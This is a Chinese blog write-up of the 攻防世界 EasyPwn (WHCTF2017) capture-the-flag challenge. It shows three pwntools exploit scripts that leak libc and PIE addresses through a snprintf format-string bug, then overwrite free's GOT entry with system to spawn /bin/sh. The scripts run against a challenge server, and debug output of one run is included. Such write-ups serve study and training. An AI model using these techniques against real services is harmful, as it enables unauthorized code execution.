攻防世界Easypwn-格式化字符串漏洞利用

最新推荐文章于 2024-08-18 09:13:53 发布
最新推荐文章于 2024-08-18 09:13:53 发布
阅读量625 收藏
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aptx4869_li/article/details/113907422
版权

格式化字符串漏洞 堆溢出 got表 system函数 内存安全
关键词由CSDN通过智能技术生成
CTF 同时被 2 个专栏收录
23 篇文章 0 订阅
订阅专栏
PWN
20 篇文章 0 订阅
订阅专栏

解题思路

基本信息查询

healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ readelf -h pwn1
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Shared object file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0xa00
  Start of program headers:          64 (bytes into file)
  Start of section headers:          8640 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         29
  Section header string table index: 28
healer@healer:~/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn$ checksec pwn1
[*] '/home/healer/Documents/CTF/PWN/3.FormatStringVulnerability/EasyPwn/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

漏洞分析

通过初步的分析发现下面的函数存在漏洞在执行snprintf()函数的时候有格式化字符串漏洞,因为观察栈空间可以发现有重叠的部分,利用这个重叠制造格式化漏洞利用
并且通过劫持free函数的got表信息,使其指向system函数,最后使用程序的正常执行流程,输入“/bin/sh”执行另一个功能即可执行system("/bin/sh")

__int64 sub_B30()
{
  char s; // [sp+10h] [bp-BF0h]@1
  char v2; // [sp+410h] [bp-7F0h]@1
  __int64 v3; // [sp+7F8h] [bp-408h]@1
  __int64 v4; // [sp+BF8h] [bp-8h]@1

  v4 = *MK_FP(__FS__, 40LL);
  memset(&s, 0, 0x400uLL);
  memset(&v3, 0, 8uLL);
  memset(&v2, 0, 0x7E8uLL);
  LOWORD(v3) = 29477;
  BYTE2(v3) = 0;
  puts("Welcome To WHCTF2017:");
  read(0, &s, 0x438uLL);
  snprintf(&v2, 0x7D0uLL, (const char *)&v3, &s);
  printf("Your Input Is :%s\n", &v2);
  return *MK_FP(__FS__, 40LL) ^ v4;
}

漏洞利用脚本

此题的一些思考

这个题做的时候因为已经触发过free()函数,所以free函数的got表值已经写入了,并且和system函数的只相差最后三个字节,修改时可以逐个字节修改,也可以逐字修改,只不过逐字修改多一点,也可以第一次一个字,第二次一个字节,或者直接一次性修改四个字节,但是这个没有尝试成功

这个题因为开了动态地址随机化,所以每一次加载的位置都不一样并且获得的system函数的值也不一样,所以构造的格式化字符串的详细数值(控制写入的字符个数值)也是不一样的,指定的位置(指向目标地址的指针)在栈中的偏移是可以确定的,所以构造的格式化字符串要动态生成。并且要首先泄露进程的加载地址,以及函数的加载地址,需要通过前期泄露出来。

可能脚本中的方法略显笨拙,大佬勿喷,汗!!!

逐字节修改方法

from pwn import *
# from LibcSearcher import * 


context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']

io = remote("111.200.241.244",48509)

# io = process("./pwn1")
libc = ELF("./libc.so.6")
# libc = ELF("./libc-2.23.so")
elf = ELF("./pwn1")

context(arch = "amd64", os = 'linux')

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)

io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240

log.info("libc_start_main: "+hex(libc_start_main))

libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))


# libc_searcher = LibcSearcher("__libc_start_main",libc_start_main)
# libc_base = libc_start_main - libc_searcher.dump("__libc_start_main")
# system = libc_base + libc_searcher.dump("system")
# system_real_addr = system
# log.info("system_real_addr: "+hex(system_real_addr))


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)

io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))

elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))

# [*] system_real_addr: 0x7fc35da95fa0
# [*] system_real_addr: 0x7fef74ad8fa0


one_byte = 0x00000000000000FF & system_real_addr
two_byte = (0x000000000000FF00 & system_real_addr) >> 8
three_byte = (0x00000000FF0000 & system_real_addr) >> 16

one_offset = one_byte + 2
two_offset = two_byte + 2
three_offset = three_byte + 2

pattern_payload = (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A")
# print(pattern_payload)

# print(one_offset,two_offset,three_offset)


io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n" 
payload = b"a"*0x3e8 + (b"bb%" + str(one_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr) 
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│      0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push   r13
# 84:0420│      0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9

# 0x7ffff7a59f59 <printf_positional+8697>    mov    word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015>    mov    byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(two_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+1) 
io.sendline(payload)

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + (b"bb%" + str(three_offset).encode() + b"c%133$hhn").ljust(16,b"A") + p64(free_got_addr+2) 
io.sendline(payload)


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")


io.interactive()

一字加一字节方法写入脚本

此脚本用在本地关了地址随机化时的测试,本地调试成功的,方法都是一样的,再加上地址随机化的处理即可作为有效的exp

from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']

# io = remote("220.249.52.134",59762)

io = process("./pwn1")
libc = ELF("./libc.so.6")
elf = ELF("./pwn1")

context(arch = "amd64", os = 'linux')

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)

io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240

log.info("libc_start_main: "+hex(libc_start_main))

libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)

io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))

elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))




io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n" 
payload = b"a"*0x3e8 + b"bb%8098c%133$hnA" + p64(free_got_addr) 
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│      0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push   r13
# 84:0420│      0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9

# 0x7ffff7a59f59 <printf_positional+8697>    mov    word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015>    mov    byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%167c%133$hhnA" + p64(free_got_addr+2) 
io.sendline(payload)


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")




io.interactive()

直接写入双字脚本

这个方法没有尝试成功,具体写入目标地址的时候发生下面内容中的错误,不想再细看了,先放着吧,估计是一次写的太大了,此方法未尝试成功

from pwn import *
context.log_level='debug'
context.terminal = ['terminator', '-x', 'sh', '-c']

# io = remote("220.249.52.134",59762)

io = process("./pwn1")
libc = ELF("./libc.so.6")
elf = ELF("./pwn1")

context(arch = "amd64", os = 'linux')

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
gdb.attach(io,"b * 0x555555554c05")
payload = b"a"*0x3e8 + b"bb%397$p"
io.sendline(payload)

io.recvuntil("0x")
libc_start_main = io.recv(12)
libc_start_main = int(b"0x"+libc_start_main,16) - 240

log.info("libc_start_main: "+hex(libc_start_main))

libc_start_main_libc = libc.symbols["__libc_start_main"]
log.info("libc_start_main_libc: "+hex(libc_start_main_libc))
system_addr = libc.symbols["system"]
log.info("system_addr: "+hex(system_addr))
offset = libc_start_main_libc - system_addr
# 24C50
system_real_addr = libc_start_main - offset
log.info("system_real_addr: "+hex(system_real_addr))


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("healer")

io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
payload = b"a"*0x3e8 + b"bb%396$p"
io.sendline(payload)

io.recvuntil("0x")
init_real_addr = io.recv(12)
init_real_addr = int(b"0x"+init_real_addr,16)
log.info("init_real_addr: "+hex(init_real_addr))

elf_base = 0xFFFFFFFFFFFFF000 & init_real_addr
free_got_addr = elf_base + 0x202018
log.info("free_got_addr: "+hex(free_got_addr))




io.recvuntil("Input Your Code:")
io.sendline("1")
io.recvuntil("Welcome To WHCTF2017:")
# payload = b"a"*0x3e8 + b"bb%135$p%136$p%137$p%138$p%139$p%140$p%141$p%142$p%143$p%144$p%145$p%146$p"
# payload = b"a"*0x3e0 + p64(free_got_addr) + b"bb%4154793912c%130$n" 
payload = b"a"*0x3e8 + b"bb%128263072c%134$nAAAA" + p64(free_got_addr) 
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
io.sendline(payload)
# 0x00007ffff7a91540 -> 0x7ffff7a523a0
# bb%8118c%135$hn%5c%136$hhnAAAAAA
# payload = b"a"*0x3e8 + b"bb%8118c%135$hn%5c%136$hhnAAAAAA" + p64(free_got_addr) + p64(free_got_addr+2)
# 83:0418│      0x7fffffffd568 —▸ 0x555555756018 —▸ 0x7ffff7a91540 (free) ◂— push   r13
# 84:0420│      0x7fffffffd570 —▸ 0x55555575601a ◂— 0xc6a000007ffff7a9

# 0x7ffff7a59f59 <printf_positional+8697>    mov    word ptr [rax], r15w
# 0x7ffff7a590f7 <printf_positional+5015>    mov    byte ptr [rax], r15b
# 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
# 0x7fffffffbfe0 ◂— 0x60186e6868243233


io.recvuntil("Input Your Code:")
io.sendline("2")
io.recvuntil("Input Your Name:")
io.sendline("/bin/sh")

io.interactive()

'''
pwndbg> watch * 0x555555756018
Hardware watchpoint 2: * 0x555555756018
pwndbg> c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7a59bd6 in printf_positional (s=s@entry=0x7fffffffcf10, format=format@entry=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., readonly_format=readonly_format@entry=0, ap=ap@entry=0x7fffffffd078, ap_savep=ap_savep@entry=0x7fffffffcaa8, done=128264096, nspecs_done=2, lead_str_end=0x7fffffffd948 "bb%128263072c%134$nAAAA\030", ' ' <repeats 176 times>..., work_buffer=0x7fffffffcae0 "x\320\377\377\377\177", save_errno=0, grouping=0x0, thousands_sep=0x7ffff7b99be5 "") at vfprintf.c:2022
2022    vfprintf.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
*RAX  0x6161616161616161 ('aaaaaaaa')
*RBX  0x7fffffffb780 ◂— 0xffffd160
*RCX  0x0
*RDX  0x17
*RDI  0x7ffff7a58bd0 (printf_positional+3696) ◂— mov    rsi, qword ptr [r14 + 0x38]
*RSI  0x20
*R8   0x0
*R9   0x6e
*R10  0x6e
*R11  0x0
*R12  0x0
*R13  0x7fffffffcf10 ◂— 0xfbad8001
*R14  0x7fffffffc5b0 ◂— 0xffffffff
*R15  0x7a527a0
*RBP  0x7fffffffc950 —▸ 0x7fffffffcf00 —▸ 0x7fffffffd560 ◂— 0x6161616161616161 ('aaaaaaaa')
*RSP  0x7fffffffb780 ◂— 0xffffd160
*RIP  0x7ffff7a59bd6 (printf_positional+7798) ◂— mov    dword ptr [rax], r15d
────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────
 ► 0x7ffff7a59bd6 <printf_positional+7798>    mov    dword ptr [rax], r15d
   0x7ffff7a59bd9 <printf_positional+7801>    jmp    printf_positional+1666 <printf_positional+1666>
    ↓
   0x7ffff7a583e2 <printf_positional+1666>    mov    rax, qword ptr [rbp - 0x478]
   0x7ffff7a583e9 <printf_positional+1673>    test   rax, rax
   0x7ffff7a583ec <printf_positional+1676>    je     printf_positional+1686 <printf_positional+1686>
    ↓
   0x7ffff7a583f6 <printf_positional+1686>    test   r15d, r15d
   0x7ffff7a583f9 <printf_positional+1689>    js     printf_positional+9059 <printf_positional+9059>
    ↓
   0x7ffff7a5a0c3 <printf_positional+9059>    lea    rcx, [rip + 0x146816] <0x7ffff7ba08e0>
   0x7ffff7a5a0ca <printf_positional+9066>    lea    rsi, [rip + 0x13fdcb]
   0x7ffff7a5a0d1 <printf_positional+9073>    lea    rdi, [rip + 0x143740]
   0x7ffff7a5a0d8 <printf_positional+9080>    mov    edx, 0x80e
─────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────
00:0000│ rbx rsp  0x7fffffffb780 ◂— 0xffffd160
01:0008│          0x7fffffffb788 ◂— 0x0
02:0010│          0x7fffffffb790 —▸ 0x7ffff7fde700 ◂— 0x7ffff7fde700
03:0018│          0x7fffffffb798 ◂— 0x0
04:0020│          0x7fffffffb7a0 ◂— 0x555599999999
05:0028│          0x7fffffffb7a8 ◂— 0x0
... ↓
───────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────
 ► f 0     7ffff7a59bd6 printf_positional+7798
   f 1     7ffff7a5a4b6 vfprintf+822
   f 2     7ffff7a83a59 vsnprintf+121
   f 3     7ffff7a62942 snprintf+130
   f 4     555555554c0a
   f 5     555555554cf9
   f 6     7ffff7a2d840 __libc_start_main+240
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> 

'''

脚本执行结果

healer@healer-virtual-machine:~/Desktop/EasyPwn$ python3 exp.py 
[+] Opening connection to 111.200.241.244 on port 48509: Done
[DEBUG] PLT 0x1f7f0 realloc
[DEBUG] PLT 0x1f800 __tls_get_addr
[DEBUG] PLT 0x1f820 memalign
[DEBUG] PLT 0x1f850 _dl_find_dso_for_object
[DEBUG] PLT 0x1f870 calloc
[DEBUG] PLT 0x1f8a0 malloc
[DEBUG] PLT 0x1f8a8 free
[*] '/home/healer/Desktop/EasyPwn/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] PLT 0x920 free
[DEBUG] PLT 0x930 puts
[DEBUG] PLT 0x940 write
[DEBUG] PLT 0x950 __stack_chk_fail
[DEBUG] PLT 0x960 printf
[DEBUG] PLT 0x970 snprintf
[DEBUG] PLT 0x980 memset
[DEBUG] PLT 0x990 read
[DEBUG] PLT 0x9a0 __libc_start_main
[DEBUG] PLT 0x9b0 malloc
[DEBUG] PLT 0x9c0 setvbuf
[DEBUG] PLT 0x9d0 atoi
[DEBUG] PLT 0x9e0 __isoc99_scanf
[DEBUG] PLT 0x9f0 __gmon_start__
[DEBUG] PLT 0x9f8 __cxa_finalize
[*] '/home/healer/Desktop/EasyPwn/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] Received 0x11 bytes:
    b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x421 bytes:
    b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%397$p\n'
    b'0x7fbf673df830\n'
    b'\n'
    b'Input Your Code:\n'
[*] libc_start_main: 0x7fbf673df740
[*] libc_start_main_libc: 0x20740
[*] system_addr: 0x45390
[*] system_real_addr: 0x7fbf67404390
[DEBUG] Sent 0x2 bytes:
    b'2\n'
[DEBUG] Received 0x11 bytes:
    b'Input Your Name:\n'
[DEBUG] Sent 0x7 bytes:
    b'healer\n'
[DEBUG] Received 0x20 bytes:
    b'OK!I Know Your Name :healer\n'
    b'Now!'
[DEBUG] Received 0x11 bytes:
    b'Input Your Code:\n'
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x3f1 bytes:
    b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x421 bytes:
    b'Your Input Is :aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabb%396$p\n'
    b'0x55e0a5c1ada0\n'
    b'\n'
    b'Input Your Code:\n'
[*] init_real_addr: 0x55e0a5c1ada0
[*] free_got_addr: 0x55e0a5e1c018
b'bb%146c%133$hhnA'
146 69 66
[DEBUG] Sent 0x2 bytes:
    b'1\n'
[DEBUG] Received 0x15 bytes:
    b'Welcome To WHCTF2017:'
[DEBUG] Sent 0x401 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003e0  61 61 61 61  61 61 61 61  62 62 25 31  34 36 63 25  │aaaa│aaaa│bb%1│46c%│
    000003f0  31 33 33 24  68 68 6e 41  18 c0 e1 a5  e0 55 00 00  │133$│hhnA│····│·U··│
    00000400  0a                                                  │·│
    00000401
[DEBUG] Received 0x1 bytes:
    b'\n'
[DEBUG] Received 0x4a4 bytes:
    00000000  59 6f 75 72  20 49 6e 70  75 74 20 49  73 20 3a 61  │Your│ Inp│ut I│s :a│
    00000010  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    000003f0  61 61 61 61  61 61 61 62  62 25 31 34  36 63 25 31  │aaaa│aaab│b%14│6c%1│
    00000400  33 33 24 68  68 6e 41 18  c0 e1 a5 e0  55 20 20 20  │33$h│hnA·│····│U   │
